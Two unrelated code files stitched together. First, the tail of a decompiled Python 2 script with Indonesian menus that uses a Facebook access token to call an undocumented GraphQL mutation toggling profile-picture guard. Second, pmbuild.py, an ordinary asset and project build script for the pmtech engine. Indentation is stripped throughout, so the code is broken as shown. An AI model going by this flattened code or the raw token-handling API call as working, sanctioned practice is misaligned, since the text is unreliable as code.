time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
pmbuild.py
|
import collections
import sys
import os.path
import json
import fnmatch
import util
import subprocess
import platform
import shutil
import time
import dependencies
import glob
import jsn.jsn as jsn
import cgu.cgu as cgu
from http.server import HTTPServer, CGIHTTPRequestHandler
import webbrowser
import threading
# returns tool to run from cmdline with .exe
def tool_to_platform(tool):
tool = util.sanitize_file_path(tool)
tool = tool.replace("$platform", util.get_platform_name())
if platform.system() == "Windows":
tool += ".exe"
return tool
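# a rough usage sketch (hypothetical tool path; exact result depends on util.sanitize_file_path):
#   tool_to_platform("bin/$platform/texturec")  ->  "bin/win32/texturec.exe" on a Windows host
#   tool_to_platform("bin/$platform/texturec")  ->  "bin/osx/texturec" on macOS (no .exe suffix)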
# ensure running with python3 or py -3
def python_tool_to_platform(tool):
tool = util.sanitize_file_path(tool)
if platform.system() == "Windows":
tool = "py -3 " + tool
else:
tool = "python3 " + tool
return tool
# checks if a file is excluded, based on known files to ignore
def is_excluded(file):
excluded_files = [".DS_Store"]
for ex in excluded_files:
if file.find(ex) != -1:
return True
return False
# writes a required value input by the user, into config.user.jsn
def update_user_config(k, v, config):
config[k] = v
user = dict()
if os.path.exists("config.user.jsn"):
user = jsn.loads(open("config.user.jsn", "r").read())
user[k] = v
bj = open("config.user.jsn", "w+")
bj.write(json.dumps(user, indent=4))
bj.close()
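# for illustration (hypothetical key/value), update_user_config("sdk_version", "10.0.19041.0", config)
# would leave a config.user.jsn along the lines of:
#   {
#       "sdk_version": "10.0.19041.0"
#   }
# any keys already present in config.user.jsn are kept; only the supplied key is overwritten.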
# locate latest version of the windows sdk
def locate_windows_sdk():
pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"]
sdk = "Windows Kits"
sdk_dir = None
for v in pf_env:
print(v)
d = os.environ[v]
if d:
if sdk in os.listdir(d):
print(sdk)
print(d)
sdk_dir = os.path.join(d, sdk)
break
if sdk_dir:
versions = sorted(os.listdir(sdk_dir), reverse=False)
if len(versions) > 0:
if versions[0] == "10":
# windows 10 has sub versions
source = os.path.join(sdk_dir, versions[0], "Source")
if os.path.exists(source):
                    sub_versions = sorted(os.listdir(source), reverse=True)  # newest sub-version first
if len(sub_versions) > 0:
return str(sub_versions[0])
else:
# 8.1
return str(versions[0])
return None
# windows only, prompt user to supply their windows sdk version
def configure_windows_sdk(config):
if "sdk_version" in config.keys():
return
# attempt to auto locate
auto_sdk = locate_windows_sdk()
if auto_sdk:
update_user_config("sdk_version", auto_sdk, config)
return
print("Windows SDK version not set.")
print("Please enter the windows sdk you want to use.")
print("You can find available sdk versions in:")
print("Visual Studio > Project Properties > General > Windows SDK Version.")
input_sdk = str(input())
update_user_config("sdk_version", input_sdk, config)
return
# find visual studio installation directory
def locate_vs_root():
pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"]
vs = "Microsoft Visual Studio"
vs_dir = ""
for v in pf_env:
d = os.environ[v]
if d:
if vs in os.listdir(d):
vs_dir = os.path.join(d, vs)
break
return vs_dir
# find latest visual studio version
def locate_vs_latest():
vs_dir = locate_vs_root()
if len(vs_dir) == 0:
print("[warning]: could not auto locate visual studio, using vs2017 as default")
return "vs2017"
supported = ["2017", "2019"]
    versions = sorted(os.listdir(vs_dir), reverse=True)  # newest first so the latest supported version wins
for v in versions:
if v in supported:
return "vs" + v
# attempt to locate vcvarsall.bat by looking in program files and finding visual studio installations
def locate_vc_vars_all():
vs_dir = locate_vs_root()
if len(vs_dir) == 0:
return None
pattern = os.path.join(vs_dir, "**/vcvarsall.bat")
    # reverse sort so we get the latest vs version first
    vc_vars = sorted(glob.glob(pattern, recursive=True), reverse=True)
if len(vc_vars) > 0:
return vc_vars[0]
return None
# windows only, configure vcvarsall directory for commandline vc compilation
def configure_vc_vars_all(config):
# already exists
if "vcvarsall_dir" in config.keys():
if os.path.exists(config["vcvarsall_dir"]):
return
# attempt to auto locate
auto_vc_vars = locate_vc_vars_all()
if auto_vc_vars:
auto_vc_vars = os.path.dirname(auto_vc_vars)
update_user_config("vcvarsall_dir", auto_vc_vars, config)
return
# user input
while True:
print("Cannot find 'vcvarsall.bat'")
print("Please enter the full path to the vc2017/vc2019 installation directory containing vcvarsall.bat")
input_dir = str(input())
input_dir = input_dir.strip("\"")
input_dir = os.path.normpath(input_dir)
if os.path.isfile(input_dir):
input_dir = os.path.dirname(input_dir)
if os.path.exists(input_dir):
update_user_config("vcvarsall_dir", input_dir, config)
return
else:
time.sleep(1)
# apple only, ask user for their team id to insert into xcode projects
def configure_teamid(config):
if "teamid" in config.keys():
return
print("Apple Developer Team ID not set.")
print("Please enter your development team ID ie. (7C3Y44TX5K)")
print("You can find team id's or personal team id on the Apple Developer website")
print("Optionally leave this blank and you select a team later in xcode:")
print(" Project > Signing & Capabilities > Team")
input_sdk = str(input())
update_user_config("teamid", input_sdk, config)
return
# configure user settings for each platform
def configure_user(config, args):
config_user = dict()
if os.path.exists("config.user.jsn"):
config_user = jsn.loads(open("config.user.jsn", "r").read())
if util.get_platform_name() == "win32":
if "-msbuild" not in sys.argv:
configure_vc_vars_all(config_user)
configure_windows_sdk(config_user)
if os.path.exists("config.user.jsn"):
config_user = jsn.loads(open("config.user.jsn", "r").read())
util.merge_dicts(config, config_user)
# look for export.json in directory tree, combine and override exports by depth, override further by fnmatch
def export_config_for_directory(filedir, platform):
filepath = util.sanitize_file_path(filedir)
dirtree = filepath.split(os.sep)
export_dict = dict()
subdir = ""
for i in range(0, len(dirtree)):
subdir = os.path.join(subdir, dirtree[i])
export = os.path.join(subdir, "export.jsn")
if os.path.exists(export):
dir_dict = jsn.loads(open(export, "r").read())
util.merge_dicts(export_dict, dir_dict)
if platform in export_dict.keys():
util.merge_dicts(export_dict, export_dict[platform])
return export_dict
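# merge-order sketch for a hypothetical tree containing assets/export.jsn and assets/textures/export.jsn:
#   export_config_for_directory("assets/textures", "osx")
# merges assets/export.jsn first, then assets/textures/export.jsn over the top, and finally
# folds any "osx" sub-dict into the result so platform-specific keys override the generic ones.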
# get file specific export config from the directory config checking for fnmatch on the basename
def export_config_for_file(filename):
dir_config = export_config_for_directory(os.path.dirname(filename), "osx")
bn = os.path.basename(filename)
for k in dir_config.keys():
if fnmatch.fnmatch(k, bn):
file_dict = dir_config[k]
util.merge_dicts(dir_config, file_dict)
return dir_config
# get files for task, will iterate dirs, match wildcards or return single files, returned in tuple (src, dst)
def get_task_files(task):
outputs = []
if len(task) != 2:
print("[error] file tasks must be an array of size 2 [src, dst]")
exit(1)
fn = task[0].find("*")
if fn != -1:
# wildcards
fnroot = task[0][:fn - 1]
for root, dirs, files in os.walk(fnroot):
for file in files:
src = util.sanitize_file_path(os.path.join(root, file))
if is_excluded(src):
continue
if fnmatch.fnmatch(src, task[0]):
dst = src.replace(util.sanitize_file_path(fnroot), util.sanitize_file_path(task[1]))
outputs.append((src, dst))
elif os.path.isdir(task[0]):
# dir
for root, dirs, files in os.walk(task[0]):
for file in files:
src = util.sanitize_file_path(os.path.join(root, file))
if is_excluded(src):
continue
dst = src.replace(util.sanitize_file_path(task[0]), util.sanitize_file_path(task[1]))
outputs.append((src, dst))
else:
# single file
if not is_excluded(task[0]):
outputs.append((task[0], task[1]))
return outputs
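# example expansions (hypothetical paths), each entry returned as an (src, dst) tuple:
#   ["assets/textures/*.png", "data/textures"]   -> one tuple per matching .png under assets/textures
#   ["assets/audio",          "data/audio"]      -> every (non-excluded) file beneath the directory
#   ["readme.txt",            "data/readme.txt"] -> the single pair unchanged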
# get files for a task sorted by directory
def get_task_files_containers(task):
container_ext = ".cont"
files = get_task_files(task)
container_files = []
skip = 0
for fi in range(0, len(files)):
if fi < skip:
continue
f = files[fi]
cpos = f[0].find(container_ext)
if cpos != -1:
container_name = f[0][:cpos + len(container_ext)]
export = export_config_for_directory(container_name, "osx")
container_src = container_name + "/container.txt"
container_dst = os.path.dirname(f[1])
container_dir = os.path.dirname(f[0])
cf = (container_src, container_dst)
file_list = ""
# list of files in json
if "files" in export:
for xf in export["files"]:
file_list += os.path.join(container_name, xf) + "\n"
# otherwise take all files in the directory
else:
dir_files = sorted(os.listdir(container_dir))
for xf in dir_files:
if xf.endswith(".jsn") or xf.endswith(".DS_Store") or xf.endswith(".txt"):
continue
file_list += os.path.join(container_name, xf) + "\n"
update_container = False
if os.path.exists(container_src):
cur_container = open(container_src, "r").read()
if cur_container != file_list:
update_container = True
else:
update_container = True
if update_container:
open(container_src, "w+").write(file_list)
container_files.append(cf)
for gi in range(fi+1, len(files)):
ff = files[gi]
cur_container_name = ff[0][:cpos + len(container_ext)]
if cur_container_name != container_name:
skip = gi
break
else:
container_files.append(f)
return container_files
# gets a list of files within container to track in dependencies
def get_container_dep_inputs(container_filepath, dep_inputs):
cf = open(container_filepath, "r").read().split("\n")
for cff in cf:
dep_inputs.append(cff)
return dep_inputs
# set visual studio version for building
def run_vs_version(config):
supported_versions = [
"vs2017",
"vs2019"
]
version = config["vs_version"]
if version == "latest":
config["vs_version"] = locate_vs_latest()
print("setting vs_version to: " + config["vs_version"])
return config
else:
if version not in supported_versions:
print("[error]: unsupported visual studio version " + str(version))
print(" supported versions are " + str(supported_versions))
# copy files, directories or wildcards
def run_copy(config):
print("--------------------------------------------------------------------------------")
print("copy ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
copy_tasks = config["copy"]
for task in copy_tasks:
files = get_task_files(task)
for f in files:
util.copy_file_create_dir_if_newer(f[0], f[1])
# single jsn job to run on a thread
def run_jsn_thread(f, ii, config, jsn_tasks):
cmd = python_tool_to_platform(config["tools"]["jsn"])
cmd += " -i " + f[0] + " -o " + f[1] + ii
imports = jsn.get_import_file_list(f[0], jsn_tasks["import_dirs"])
inputs = [f[0], config["tools"]["jsn"]]
for im in imports:
inputs.append(im)
dep = dependencies.create_dependency_info(inputs, [f[1]], cmd)
if not dependencies.check_up_to_date_single(f[1], dep):
subprocess.call(cmd, shell=True)
dependencies.write_to_file_single(dep, util.change_ext(f[1], ".dep"))
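# the command assembled above ends up looking roughly like (hypothetical paths):
#   python3 <path to jsn tool> -i assets/configs/renderer.jsn -o data/configs/renderer.json -I assets/configs
# the .dep file written alongside the output is what lets later runs skip files that are already up to date.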
# convert jsn to json for use at runtime
def run_jsn(config):
print("--------------------------------------------------------------------------------")
print("jsn ----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
threads = []
jsn_tasks = config["jsn"]
ii = " -I "
for i in jsn_tasks["import_dirs"]:
ii += i + " "
for task in jsn_tasks["files"]:
files = get_task_files(task)
for f in files:
if not os.path.exists(f[0]):
print("[warning]: file or directory " + f[0] + " does not exist!")
continue
x = threading.Thread(target=run_jsn_thread, args=(f, ii, config, jsn_tasks))
threads.append(x)
x.start()
for t in threads:
t.join()
# premake
def run_premake(config):
print("--------------------------------------------------------------------------------")
print("premake ------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cmd = tool_to_platform(config["tools"]["premake"])
for c in config["premake"]:
if c == "vs_version":
c = config["vs_version"]
cmd += " " + c
# add pmtech dir
cmd += " --pmtech_dir=\"" + config["env"]["pmtech_dir"] + "\""
# add sdk version for windows
if "sdk_version" in config.keys():
cmd += " --sdk_version=\"" + str(config["sdk_version"]) + "\""
# check for teamid
if "require_teamid" in config:
if config["require_teamid"]:
configure_teamid(config)
cmd += " --teamid=\"" + config["teamid"] + "\""
subprocess.call(cmd, shell=True)
# pmfx
def run_pmfx(config):
cmd = python_tool_to_platform(config["tools"]["pmfx"])
for c in config["pmfx"]:
cmd += " " + c
subprocess.call(cmd, shell=True)
# single model build / optimise run on a separate thread
def run_models_thread(cmd):
p = subprocess.Popen(cmd, shell=True)
p.wait()
# models
def run_models(config):
print("--------------------------------------------------------------------------------")
print("models -------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
tool_cmd = python_tool_to_platform(config["tools"]["models"])
threads = []
for task in config["models"]:
task_files = get_task_files(task)
mesh_opt = ""
if os.path.exists(config["tools"]["mesh_opt"]):
mesh_opt = config["tools"]["mesh_opt"]
for f in task_files:
cmd = " -i " + f[0] + " -o " + os.path.dirname(f[1])
if len(mesh_opt) > 0:
cmd += " -mesh_opt " + mesh_opt
x = threading.Thread(target=run_models_thread, args=(tool_cmd + cmd,))
threads.append(x)
x.start()
for t in threads:
t.join()
# build third_party libs
def run_libs(config):
print("--------------------------------------------------------------------------------")
print("libs ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
shell = ["linux", "osx", "ios"]
cmd = ""
for arg in config["libs"]:
cmd = arg
if util.get_platform_name() in shell:
pass
else:
args = ""
args += config["env"]["pmtech_dir"] + "/" + " "
args += config["sdk_version"] + " "
if "vs_version" not in config:
config["vs_version"] = "vs2017"
args += config["vs_version"] + " "
cmd += "\"" + config["vcvarsall_dir"] + "\"" + " " + args
print(cmd)
p = subprocess.Popen(cmd, shell=True)
p.wait()
# textures
def run_textures(config):
print("--------------------------------------------------------------------------------")
print("textures -----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
tool_cmd = tool_to_platform(config["tools"]["texturec"])
for task in config["textures"]:
files = get_task_files_containers(task)
for f in files:
copy_fmt = [".dds", ".pmv"]
conv_fmt = [".png", ".jpg", ".tga", ".bmp", ".txt"]
cont_fmt = [".txt"]
fext = os.path.splitext(f[0])[1]
if fext in copy_fmt:
util.copy_file_create_dir_if_newer(f[0], f[1])
if fext in conv_fmt:
export = export_config_for_file(f[0])
dep_inputs = [f[0], config["tools"]["texturec"]]
if fext in cont_fmt:
export = export_config_for_directory(f[0], "osx")
dep_inputs = get_container_dep_inputs(f[0], dep_inputs)
dst = util.change_ext(f[1], ".dds").lower()
# to refactor
if "format" not in export.keys():
export["format"] = "RGBA8"
cmd = tool_cmd + " "
cmd += "-f " + f[0] + " "
cmd += "-t " + export["format"] + " "
if "cubemap" in export.keys() and export["cubemap"]:
cmd += " --cubearray "
if "mips" in export.keys() and export["mips"]:
cmd += " --mips "
if "texturec" in export.keys():
cmd += export["texturec"]
cmd += "-o " + dst
dep = dependencies.create_dependency_info(dep_inputs, [dst], cmd)
if not dependencies.check_up_to_date_single(dst, dep):
util.create_dir(dst)
subprocess.call(cmd, shell=True)
dependencies.write_to_file_single(dep, util.change_ext(dst, ".dep"))
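# for a single converted texture the command built above is roughly (hypothetical paths, default format):
#   <texturec> -f assets/textures/stone.png -t RGBA8 -o data/textures/stone.dds
# --mips / --cubearray are appended only when the matching export.jsn asks for them, and
# .dds / .pmv sources are copied through unchanged rather than converted.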
# cleans directories specified in config["clean"]
def run_clean(config):
print("--------------------------------------------------------------------------------")
print("clean --------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
for clean_task in config["clean"]:
if os.path.isfile(clean_task):
print("file " + clean_task)
os.remove(clean_task)
elif os.path.isdir(clean_task):
print("directory " + clean_task)
shutil.rmtree(clean_task)
# generates metadata json to put in data root dir, for doing hot loading and other re-build tasks
def generate_pmbuild_config(config, profile):
if "data_dir" not in config:
print("[error]: did not generate pmbuild_config.json for live reloading")
return
wd = os.getcwd()
pmd = util.sanitize_file_path(config["env"]["pmtech_dir"])
md = {
"profile": profile,
"pmtech_dir": pmd,
"pmbuild": "cd " + wd + " && " + pmd + "pmbuild " + profile + " "
}
util.create_dir(config["data_dir"])
np = os.path.join(config["data_dir"], "pmbuild_config.json")
np = os.path.normpath(np)
f = open(np, "w+")
f.write(json.dumps(md, indent=4))
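# the emitted pmbuild_config.json looks roughly like this (hypothetical profile and directories):
#   {
#       "profile": "osx",
#       "pmtech_dir": "../pmtech/",
#       "pmbuild": "cd /path/to/project && ../pmtech/pmbuild osx "
#   }
# it is dropped into data_dir so hot-loading / re-build tooling knows how to invoke pmbuild again.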
# gets a commandline to setup vcvars for msbuild from command line
def setup_vcvars(config):
return "pushd \ && cd \"" + config["vcvarsall_dir"] + "\" && vcvarsall.bat x86_amd64 && popd"
# run build commands.. build is now deprecated in favour of 'make'
def run_build(config):
print("--------------------------------------------------------------------------------")
print("build --------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
for build_task in config["build"]:
if util.get_platform_name() == "win32":
build_task = setup_vcvars(config) + " && " + build_task
p = subprocess.Popen(build_task, shell=True)
e = p.wait()
if e != 0:
            exit(e)
# generate a cli command for building with different toolchains (make, gcc/clang, xcodebuild, msbuild)
def make_for_toolchain(jsn_config, options):
make_config = jsn_config["make"]
toolchain = make_config["toolchain"]
exts = {
"make": ".make",
"emmake": ".make",
"xcodebuild": ".xcodeproj",
"msbuild": ".vcxproj"
}
ext = exts[toolchain]
strip_ext_toolchain = ["make", "emmake"]
strip_exts = [".make"]
# first option is always target, it can be 'all' or a single build
targets = []
if options[0] == "all":
for file in os.listdir(make_config["dir"]):
if file.endswith(ext):
if ext in strip_exts:
file = os.path.splitext(file)[0]
targets.append(file)
else:
if toolchain not in strip_ext_toolchain:
targets.append(options[0] + ext)
else:
targets.append(options[0])
# msbuild needs vcvars all
setup_env = ""
if toolchain == "msbuild":
setup_env = setup_vcvars(jsn_config) + " &&"
cmds = {
"make": "make",
"emmake": "emmake make",
"xcodebuild": "xcodebuild",
"msbuild": "msbuild"
}
cmd = cmds[toolchain]
target_options = {
"make": "",
"emmake": "",
"xcodebuild": "-project ",
"msbuild": ""
}
target_option = target_options[toolchain]
configs = {
"make": "config=",
"emmake": "config=",
"xcodebuild": "-configuration ",
"msbuild": "/p:Configuration="
}
config = ""
# parse other options
extra_args = ""
for option in options[1:]:
# config
if option.find("config=") != -1:
config = configs[toolchain]
config += option.replace("config=", "")
else:
# pass through any additional platform specific args
extra_args += option
# build final cli command
make_commands = []
for target in targets:
cmdline = setup_env + " " + cmd + " " + target_option + " " + target + " " + config + " " + extra_args
make_commands.append(cmdline)
return make_commands
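# illustrative output, assuming toolchain "make" with options ["basic_texture", "config=release"]:
#   "make basic_texture config=release"   (modulo extra whitespace from the joins above)
# with target "all" every matching project in make.dir gets its own command, and msbuild
# commands are additionally prefixed with the vcvarsall setup from setup_vcvars().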
# runs make, and compiles from makefiles, vs solution or xcode project.
def run_make(config, options):
print("--------------------------------------------------------------------------------")
print("make ---------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cwd = os.getcwd()
if "make" not in config.keys():
print("[error] make config missing from config.jsn ")
return
if len(options) == 0:
print("[error] no make target specified")
return
make_commands = make_for_toolchain(config, options)
# cd to the build dir
os.chdir(config["make"]["dir"])
if len(options) == 0:
print("[error] no make target specified")
else:
for mc in make_commands:
subprocess.call(mc, shell=True)
os.chdir(cwd)
# start a simple webserver on the given port (the path argument is currently unused; serves the working directory)
def start_server(path, port=8000):
httpd = HTTPServer(('', port), CGIHTTPRequestHandler)
httpd.serve_forever()
# starts a web server on a thread and loads a sample in the browser
def run_web(cmd):
port = 8000
daemon = threading.Thread(name='daemon_server', target=start_server, args=('.', port))
    daemon.daemon = True  # equivalent to the deprecated setDaemon(True)
daemon.start()
chrome_path = {
"osx": 'open -a /Applications/Google\ Chrome.app %s',
"win32": "C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s",
"linux": ""
}
plat = util.get_platform_name()
webbrowser.get(chrome_path[plat]).open('http://localhost:{}/{}'.format(port, cmd))
while True:
time.sleep(1)
# launches an executable program from the commandline
def run_exe(config, options):
print("--------------------------------------------------------------------------------")
print("run ----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
cwd = os.getcwd()
if "run" not in config.keys():
print("[error] run config missing from config.jsn ")
return
run_config = config["run"]
if len(options) == 0:
print("[error] no run target specified")
return
targets = []
if options[0] == "all":
for file in os.listdir(run_config["dir"]):
if file.endswith(run_config["ext"]):
targets.append(os.path.splitext(file)[0])
else:
targets.append(options[0])
# switch to bin dir
os.chdir(run_config["dir"])
for t in targets:
cmd = run_config["cmd"]
cmd = cmd.replace("%target%", t)
if run_config["ext"] == ".html":
run_web(cmd)
else:
for o in options[1:]:
cmd += " " + o
print(cmd)
subprocess.call(cmd, shell=True)
os.chdir(cwd)
# generates function pointer bindings to call pmtech from a live reloaded dll.
def run_cr(config):
print("--------------------------------------------------------------------------------")
print("cr -----------------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print(config["cr"]["output"])
files = config["cr"]["files"]
free_funcs = []
added = []
for f in files:
source = open(f, "r").read()
source = cgu.remove_comments(source)
strings, source = cgu.placeholder_string_literals(source)
functions, function_names = cgu.find_functions(source)
for func in functions:
free = len(func["qualifier"]) == 0
for s in func["scope"]:
if s["type"] == "struct":
free = False
break
# cant add members
if not free:
continue
# cant add overloads
if func["name"] in added:
continue
func["file"] = os.path.basename(f)
added.append(func["name"])
free_funcs.append(func)
# start writing code
code = cgu.src_line("// codegen_2")
code += cgu.src_line("#pragma once")
for f in files:
bn = os.path.basename(f)
code += cgu.src_line('#include ' + cgu.in_quotes(bn))
code += cgu.src_line("using namespace pen;")
code += cgu.src_line("using namespace put;")
code += cgu.src_line("using namespace pmfx;")
code += cgu.src_line("using namespace ecs;")
code += cgu.src_line("using namespace dbg;")
# sort by immediate scope
scope_funcs = dict()
for f in free_funcs:
ff = f["file"]
l = len(f["scope"])
if l > 0:
s = f["scope"][l-1]["name"]
if s not in scope_funcs.keys():
scope_funcs[s] = list()
scope_funcs[s].append(f)
# add bindings grouped by scope
for scope in scope_funcs:
# function pointer typedefs
for f in scope_funcs[scope]:
args = cgu.get_funtion_prototype(f)
code += cgu.src_line("typedef " + f["return_type"] + " (*proc_" + f["name"] + ")" + args + ";")
# struct
struct_name = "__" + scope
code += cgu.src_line("struct " + struct_name + " {")
code += cgu.src_line("void* " + struct_name + "_start;")
# function pointers members
for f in scope_funcs[scope]:
code += cgu.src_line("proc_" + f["name"] + " " + f["name"] + ";")
code += cgu.src_line("void* " + struct_name + "_end;")
code += cgu.src_line("};")
# pointers to contexts
inherit = ""
for scope in scope_funcs:
if len(inherit) > 0:
inherit += ", "
inherit += "public __" + scope
code += cgu.src_line("struct live_context:")
code += cgu.src_line(inherit + "{")
code += cgu.src_line("f32 dt;")
code += cgu.src_line("ecs::ecs_scene* scene;")
for scope in scope_funcs:
code += cgu.src_line("__" + scope + "* " + scope + "_funcs;")
code += cgu.src_line("live_context() {")
# bind function pointers to addresses
code += cgu.src_line("#if !DLL")
for scope in scope_funcs:
for f in scope_funcs[scope]:
full_scope = ""
for q in f["scope"]:
if q["type"] == "namespace":
full_scope += q["name"] + "::"
code += cgu.src_line(f["name"] + " = &" + full_scope + f["name"] + ";")
code += cgu.src_line("#endif")
code += cgu.src_line("}")
code += cgu.src_line("};")
output_file = open(config["cr"]["output"], "w")
output_file.write(cgu.format_source(code, 4))
return
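# the generated header has roughly this shape (abridged; names depend on the scanned sources):
#   typedef void (*proc_some_func)(u32 arg);
#   struct __ecs { void* __ecs_start; proc_some_func some_func; void* __ecs_end; };
#   struct live_context : public __ecs { f32 dt; ecs::ecs_scene* scene; ... };
# i.e. one function-pointer struct per namespace, combined into a live_context the reloaded dll binds against.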
# top level help
def pmbuild_help(config):
print("pmbuild -help ------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("\nusage: pmbuild <profile> <tasks...>")
print("\noptions:")
print(" -help (display this dialog).")
print(" -<task> -help (display task help).")
print(" -cfg (print jsn config for current profile).")
print(" -msbuild (indicates msbuild prompt and no need to call vcvarsall.bat")
print("\nprofiles:")
print(" config.jsn (edit task settings in here)")
for p in config.keys():
print(" " * 8 + p)
print("\ntasks (in order of execution):")
print(" -all (builds all tasks).")
print(" -n<task name> (excludes task).")
print(" -clean (delete specified directories).")
print(" -libs (build thirdparty libs).")
print(" -premake (run premake, generate ide projects).")
print(" -models (convert to binary model, skeleton and material format).")
print(" -pmfx (shader compilation, code-gen, meta-data gen).")
print(" -textures (convert, compress, generate mip-maps, arrays, cubemaps).")
print(" -copy (copy files, folders or wildcards) [src, dst].")
print(" -build (build code) [src, dst]. deprecated use make instead.")
print("\nexplicit tasks (must specify flag, not included in -all):")
print(" -make (runs make, xcodebuild, msbuild) <target> <config> <flags>")
print(" -run (runs exe) <target> <options>")
print("\n")
def clean_help(config):
print("clean help ---------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("removes all intermediate and temp directories:")
print("\njsn syntax: array of [directories to remove...].")
print("clean: [")
print(" [<rm dir>],")
print(" ...")
print("]")
print("\n")
def vs_version_help(config):
print("vs version help ---------------------------------------------------------------")
print("-------------------------------------------------------------------------------")
print("select version of visual studio for building libs and porjects:")
print("\njsn syntax:")
print("vs_version: <version>")
print("\n")
print("version options:")
print(" latest (will choose latest version installed on your machine)")
print(" vs2017 (minimum supported compiler)")
print(" vs2019")
print("\n")
def libs_help(config):
print("libs help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("builds tools and third-party libraries:")
print("\njsn syntax: array of [cmdlines, ..]")
print("libs: [")
print(" [\"command line\"],")
print(" ...")
print("]\n")
print("reguires:")
print(" config[\"env\"][\"pmtech_dir\"]")
print(" win32:")
print(" config[\"sdk_version\"]")
print(" config[\"vcvarsall_dir\"]")
print("\n")
def premake_help(config):
print("premake help -------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("generate ide projects or make files from lua descriptions:")
print("\njsn syntax: array of [<action>, cmdline options..]")
print("premake: [")
print(" [\"<action> (vs2017, xcode4, gmake, android-studio)\"],")
print(" [\"--premake_option <value>\"],")
print(" ...")
print("]\n")
print("reguires: config[\"env\"][\"pmtech_dir\"]\n")
cmd = tool_to_platform(config["tools"]["premake"])
cmd += " --help"
subprocess.call(cmd, shell=True)
print("\n")
def pmfx_help(config):
print("pmfx help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("compile platform specific shaders:")
print("\njsn syntax: array of [cmdline options, ..]")
print("pmfx: [")
print(" [\"-pmfx_option <value>\"],")
print(" ...")
print("]\n")
cmd = python_tool_to_platform(config["tools"]["pmfx"])
cmd += " -help"
subprocess.call(cmd, shell=True)
print("\n")
def models_help(config):
print("models help --------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("create binary pmm and pma model files from collada files:")
print("\njsn syntax: array of [src, dst] pairs.")
print("models: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("accepted file formats: .dae, .obj")
print("\n")
def textures_help(config):
print("textures help ------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("convert, re-size or compress textures:")
print("\njsn syntax: array of [src, dst] pairs.")
print("copy: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("export.jsn:")
print("{")
print(" format: \"RGBA8\"")
print(" filename.png {")
print(" format: \"override_per_file\"")
print(" }")
print("}\n")
tool_cmd = tool_to_platform(config["tools"]["texturec"])
subprocess.call(tool_cmd + " --help", shell=True)
subprocess.call(tool_cmd + " --formats", shell=True)
print("\n")
def copy_help(config):
print("copy help ----------------------------------------------------------------------")
print("--------------------------------------------------------------------------------")
print("copy files from src to dst:")
print("\njsn syntax: array of [src, dst] pairs.")
print("copy: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("\n")
def jsn_help(config):
print("jsn help ----------------------------------------------------------------------")
print("-------------------------------------------------------------------------------")
print("convert jsn to json:")
print("\njsn syntax: array of [src, dst] pairs.")
print("jsn: [")
print(" [<src files, directories or wildcards>, <dst file or folder>],")
print(" ...")
print("]")
print("\n")
def build_help(config):
print("build help ----------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax: array of commands.")
print("build: [")
print(" command args args args,")
print(" ...")
print("]")
print("\n")
def make_help(config):
print("make help ----------------------------------------------------------------------")
print("---------------------------------------------------------------------------------")
print("\njsn syntax:")
print("make: {")
print(" toolchain: <make, emmake, xcodebuild, msbuild>")
